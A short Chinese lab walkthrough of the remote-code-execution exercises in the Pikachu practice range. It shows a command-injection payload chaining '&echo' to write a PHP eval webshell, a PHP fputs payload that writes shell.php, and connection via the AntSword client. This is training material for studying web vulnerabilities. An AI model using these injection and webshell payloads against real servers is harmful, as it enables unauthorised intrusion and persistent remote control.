Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
毕设源码-赖学姐5 分钟前
【开题答辩全过程】以 高校学科竞赛管理系统安全开发为例,包含答辩的问题和答案
安全
代码游侠7 分钟前
ARM开发——阶段问题综述(二)
运维·arm开发·笔记·单片机·嵌入式硬件·学习
麦聪聊数据8 分钟前
智慧医疗数据互联互通:使用 QuickAPI 构建实时诊疗数据交换层
数据库·sql·安全
Mr.朱鹏1 小时前
Nginx路由转发案例实战
java·运维·spring boot·nginx·spring·intellij-idea·jetty
java_logo1 小时前
OpenCode 企业级 Docker 部署完整指南
运维·docker·容器·opencode·opencode本地化部署·opencode部署手册·opencode部署方案
TTBIGDATA3 小时前
【knox】User: knox is not allowed to impersonate admin
大数据·运维·ambari·hdp·trino·knox·bigtop
啥都想学点3 小时前
kali基础介绍(Reconnaissance侦察)
安全
佑白雪乐3 小时前
<Linux基础第10集>复习前面内容
linux·运维·服务器
春日见4 小时前
自动驾驶规划控制决策知识点扫盲
linux·运维·服务器·人工智能·机器学习·自动驾驶